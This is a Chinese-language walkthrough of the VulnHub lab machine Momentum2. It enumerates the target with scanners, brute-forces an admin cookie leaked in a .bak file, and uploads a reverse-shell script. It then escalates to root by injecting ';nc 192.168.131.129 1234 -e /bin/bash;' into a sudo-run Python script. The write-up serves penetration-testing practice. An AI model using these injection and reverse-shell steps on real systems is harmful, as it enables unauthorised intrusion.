[Vulnhub]Momentum2
信息搜集
1.netdiscover
扫了半天扫不到,后来dl告诉说虚拟机配置有问题,参考
https://blog.csdn.net/qq_45290991/article/details/114189156
然后顺利扫到ip
2.masscan
masscan --rate=10000 --ports 0-65535 192.168.131.133
3.nmap
nmap -A 192.168.131.133
网站测试
尝试目录扫描
dirb,御剑等扫描无结果
gobuster dir -u http://192.168.131.133/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
使用gobuster扫描
信息 1
进入dashboard.html
发现是一个文件上传网页
-----------------------------之前没做完,接下来继续做-----------------------------------
信息 2
还扫到一个ajax.php,没东西;试试ajax.php.bak
//The boss told me to add one more Upper Case letter at the end of the cookieif(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){//[+] Add if $_POST['secure'] == 'val1d'$valid_ext = array("pdf","php","txt");}else{$valid_ext = array("txt");}// Remember success upload returns 1
内容是需要在cookie最后再添加一个大写字母。如果是admin,并且cookie也正确,还需post一个参数secure并设置为val1d,就可以上传pdf,php,txt类型的文件,否则只能上传txt文件。
Shell
那么思路就很清晰了,上传一个反弹shell脚本,在这之前我们需要用burp爆破出cookie的最后一位
记得还要post参数
最终发现只有R的Response为1,其他都为0,那么最后一位应该是R
我们修改后发包
可以看到已经成功上传,接下来监听本地端口,再访问该脚本
反弹成功
提权
在home/athena下发现user.txt,拿到第一个flag
同一目录下面还有password-reminder.txt
password : myvulnerableapp[Asterisk]
由此我们得到:
用户名:athena
密码:myvulnerableapp* (Asterisk是*的意思)
尝试ssh登录
ssh athena@192.168.131.133
查看用户具有的sudo权限,sudo -l
athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser athena may run the following commands on momentum2:(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
查看cookie-gen.py
import random
import os
import subprocessprint('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'seed = input("Enter the seed : ")
random.seed = seedcookie = ''
for c in range(20):cookie += random.choice(chars)print(cookie)cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)
运行后会要输入seed的值,这个值会echo到log.txt文件中,并且会执行bash命令,可以直接反弹shell
构造:
;nc 192.168.131.129 1234 -e /bin/bash;
成功获得root权限
[Vulnhub]Momentum2相关推荐
- 靶场练习第二十二天~vulnhub靶场之Momentum-2
一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- 靶场练习第二十五天~vulnhub靶场之Raven-2
一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...
- 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...
最新文章
- TextInputLayout
- Another app is currently holding the yum lock; waitingn
- AI入门:不用任何公式把逐步提升讲清楚
- LeetCode_链表类
- Win7无线网络共享设置方法
- 《JavaScript 高级程序设计》笔记 第1~5章
- 泛型实现List(ListT)排序
- 关于HashMap容量的初始化,还有这么多学问。
- 130_传析阅管理系统accdb64位版本
- 某公司R2631E以太口通过SDH接新桥的ATM交换机,出现丢包问题的解决方法
- VB模拟指针模块mPoint.bas
- java项目实战 学生信息管理系统(UI界面+连接数据库)
- 炼油化工常用英文缩写
- 《圈子圈套2》—— 读后总结
- 计算机网络实践报告--网络安全
- IP被封检测和端口被封检测方法分享
- Edge Intelligence: On-Demand Deep Learning Model Co-Inference with Device-Edge Synergy
- 程序员的焦虑!程序媛的捉急!测试的前景和钱景知多少?
- 2kids学汉字 android,新2Kids学汉字
- 《运营力——微信公众号 设计 策划 客服 管理 一册通》一一1.1 创博公众号团队简介...